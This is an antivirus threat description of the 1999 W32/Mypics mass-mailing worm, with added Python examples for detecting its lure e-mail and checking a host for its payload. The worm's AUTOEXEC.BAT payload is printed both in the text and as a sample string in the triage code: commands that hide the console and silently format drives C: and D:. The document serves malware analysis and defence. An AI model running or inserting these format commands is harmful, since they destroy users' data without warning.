I-Worm.Mypics, W32/Mypics.bat, W32/Mypics.com, W32/Mypics.worm

W32/Mypics.com, W32/Mypics.bat

Date Added

Discovery Date: 11/29/99
Risk Assessment: medium
Minimum DAT: 4055
Minimum Engine: 4.0.25

This worm was written in Visual Basic and depends on the runtime library MSVBVM50.DLL; without that file the program fails to run. When executed, the worm copies itself to the local machine and registers itself to run at system startup from one of the following registry locations, depending on whether the operating system is Windows 9x or NT:



While resident as a running task, the worm performs two functions: one spreads it via its e-mail routine, the other monitors the system clock for the date to reach January 1st, 2000.

If executed, this worm distributes itself by mass e-mail. It appears to use code similar to the W97M/Melissa virus, sending itself via MS Outlook to the first 50 recipients in the address book. The e-mails it creates contain no subject line, only the message body "Here's some pictures for you !" and the attached file "Pics4You.exe" (34,304 bytes).
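The message characteristics above (empty Subject, fixed lure body, a 34,304-byte Pics4You.exe attachment) are exactly what a mail gateway can match on. The following is an added example, not code from the original AVERT description: a Python check using the standard library's email package that reports each indicator separately, so a renamed attachment or a changed subject is still flagged. The sample message is constructed here, the attachment is an inert zero-filled blob of the right size rather than the worm, and the helper names (mypics_indicators, is_mypics, build_sample, parse_raw) are this example's own.

```python
"""Mail-gateway check for the W32/Mypics.worm message pattern (added example)."""
from email import message_from_bytes, policy
from email.message import EmailMessage

# Indicators taken from the worm description: lure body, attachment name, size.
MYPICS_BODY = "Here's some pictures for you !"
MYPICS_ATTACHMENT = "pics4you.exe"
MYPICS_SIZE = 34304


def mypics_indicators(msg: EmailMessage) -> list:
    """Return the Mypics indicators present in msg (empty list = nothing matched).

    Each indicator is checked on its own so that a partial match (attachment
    renamed, subject added by a forwarder) is reported rather than missed.
    """
    hits = []
    subject = msg.get("Subject")
    if subject is None or not subject.strip():
        hits.append("missing or empty Subject header")

    body_part = msg.get_body(preferencelist=("plain",))
    if body_part is not None and body_part.get_content().strip() == MYPICS_BODY:
        hits.append("body text matches Mypics lure")

    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        payload = part.get_payload(decode=True) or b""
        if name == MYPICS_ATTACHMENT:
            hits.append("attachment named Pics4You.exe")
            if len(payload) == MYPICS_SIZE:
                hits.append("attachment size 34,304 bytes")
        elif name.endswith(".exe") and len(payload) == MYPICS_SIZE:
            hits.append("34,304-byte .exe attachment under another name")
    return hits


def is_mypics(msg: EmailMessage) -> bool:
    """Quarantine verdict: the lure body or the named attachment is present."""
    return any(h.startswith(("body text", "attachment named"))
               for h in mypics_indicators(msg))


def parse_raw(raw: bytes) -> EmailMessage:
    """Parse a raw RFC 5322 message with the modern policy so EmailMessage helpers work."""
    return message_from_bytes(raw, policy=policy.default)


def build_sample(subject=None, body=MYPICS_BODY,
                 attachment_name="Pics4You.exe", size=MYPICS_SIZE) -> EmailMessage:
    """Constructed sample resembling the worm's mail; the payload is inert zero bytes."""
    msg = EmailMessage(policy=policy.default)
    msg["From"] = "victim@example.com"
    msg["To"] = "contact@example.com"
    if subject is not None:  # the worm sends no Subject header at all
        msg["Subject"] = subject
    msg.set_content(body)
    msg.add_attachment(b"\x00" * size, maintype="application",
                       subtype="octet-stream", filename=attachment_name)
    return msg


if __name__ == "__main__":
    sample = build_sample()
    for hit in mypics_indicators(sample):
        print("indicator:", hit)
    print("verdict:", "quarantine" if is_mypics(sample) else "deliver")
```

The size check is kept as a secondary indicator only: a gateway rule keyed on the exact byte count alone would be trivially defeated by a repacked copy, so the verdict is driven by the lure body and the attachment name, with the size reported for triage.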

If the worm is running as a task and detects that the year has changed from 1999 to 2000, it writes a small .COM file named "CBIOS.COM" to the root of drive C:. This file is a trojan that overwrites the checksum value for the BIOS on the local system.

AUTOEXEC.BAT is also overwritten with the following instructions. "ctty nul" detaches the console so nothing is displayed and no prompt can be answered, and /autotest is an undocumented FORMAT switch that skips the confirmation, so on the next Windows 9x boot both drives are formatted silently:

ctty nul
format d: /autotest /q /u
format c: /autotest /q /u

Windows NT does not execute AUTOEXEC.BAT at boot, so this part of the payload never runs on NT. After the AUTOEXEC.BAT modification, the user's browser home page is reset to the following web location: http://www.geocities.com/SiliconValley/Vista/8279/index.html

Reset your browser home page manually to correct this.
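The two file-system artefacts of the payload (CBIOS.COM in the root of C: and the rewritten AUTOEXEC.BAT) are what a responder would check on a suspect Windows 9x system before it is rebooted, since the format runs on the next boot. The following is an added example, not code from the original AVERT description: a Python triage routine that parses an AUTOEXEC.BAT body for the ctty nul / format sequence and looks for CBIOS.COM in a drive root. The root directory is assumed to be mounted or copied somewhere readable; the demo builds a temporary stand-in with constructed files, and the helper names (scan_autoexec, triage_root, destructive_payload_present, demo) are this example's own.

```python
"""Host triage for the W32/Mypics.worm destructive payload (added example)."""
import os
import re
import tempfile

# "format <drive>: <switches>"; captures the drive letter and the switch list.
FORMAT_RE = re.compile(r"^\s*format\s+([a-z]):\s*(.*)$", re.IGNORECASE)


def scan_autoexec(text: str) -> list:
    """Return findings for an AUTOEXEC.BAT body; an empty list means nothing suspicious.

    The worm's version is:
        ctty nul
        format d: /autotest /q /u
        format c: /autotest /q /u
    "ctty nul" detaches the console so no prompt or output is seen, and
    /autotest is an undocumented FORMAT switch that skips the confirmation.
    Any format line is reported, whatever the drive letter or switch order.
    """
    findings = []
    console_detached = False
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if line.lower() in ("ctty nul", "ctty nul:"):
            console_detached = True
            findings.append(f"line {lineno}: console redirected to NUL")
            continue
        m = FORMAT_RE.match(line)
        if not m:
            continue
        drive, switches = m.group(1).upper(), m.group(2).lower().split()
        note = f"line {lineno}: format of drive {drive}:"
        if "/autotest" in switches:
            note += " with /autotest (no confirmation)"
        if "/u" in switches:
            note += ", unconditional"
        if console_detached:
            note += ", after ctty nul (hidden)"
        findings.append(note)
    return findings


def triage_root(root: str) -> dict:
    """Check a drive root (or a directory standing in for one) for payload artefacts."""
    result = {"cbios_com": False, "autoexec_findings": []}
    for name in os.listdir(root):
        if name.upper() == "CBIOS.COM":
            result["cbios_com"] = True
        elif name.upper() == "AUTOEXEC.BAT":
            # DOS batch files are OEM (cp437) text; tolerate odd bytes rather than fail.
            with open(os.path.join(root, name), encoding="cp437", errors="replace") as fh:
                result["autoexec_findings"] = scan_autoexec(fh.read())
    return result


def destructive_payload_present(result: dict) -> bool:
    """True if either payload artefact was found."""
    return result["cbios_com"] or any(
        "format of drive" in f for f in result["autoexec_findings"])


# Constructed sample AUTOEXEC.BAT bodies: the worm's, and a typical benign one.
MYPICS_AUTOEXEC = "ctty nul\r\nformat d: /autotest /q /u\r\nformat c: /autotest /q /u\r\n"
BENIGN_AUTOEXEC = "@echo off\r\nPATH C:\\WINDOWS;C:\\DOS\r\nSET TEMP=C:\\TEMP\r\n"


def demo(autoexec: str, drop_cbios: bool) -> dict:
    """Build a temporary stand-in for the root of C: and triage it."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "AUTOEXEC.BAT"), "w", newline="") as fh:
            fh.write(autoexec)
        if drop_cbios:
            # Inert placeholder (INT 20h, exit to DOS); the real CBIOS.COM is the trojan.
            with open(os.path.join(root, "CBIOS.COM"), "wb") as fh:
                fh.write(b"\xcd\x20")
        return triage_root(root)


if __name__ == "__main__":
    for finding in scan_autoexec(MYPICS_AUTOEXEC):
        print(finding)
    print("infected stand-in:", destructive_payload_present(demo(MYPICS_AUTOEXEC, True)))
    print("clean stand-in:", destructive_payload_present(demo(BENIGN_AUTOEXEC, False)))
```

On a live machine, run this against the mounted boot drive before rebooting; a positive finding means AUTOEXEC.BAT should be restored from a known-good copy and CBIOS.COM removed, since the format commands execute on the next Windows 9x start.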

In AVERT testing on a standard Windows 95 system, the damaging payload was not triggered if the system date was already past January 1, 2000 when the worm was first installed; the trigger is the year changing from 1999 to 2000 while the worm is running.

Both the BAT and COM files are detected as "W32/Mypics.bat" and "W32/Mypics.com" respectively.

Indications of infection are the presence of the worm executable on the local system, the registry run entry described above, and the mass mailing described above.

Method Of Infection
Running the executable causes it to copy itself to the system and start the mass-mailing routine.

EXTRA Drivers
VirusScan 4 with the 4.0.25 engine (and above).
Dr. Solomon's AVTK 7.95 (and above).
There is no detection for VirusScan 3.

Removal Instructions
Use current engine and DAT files for detection and removal.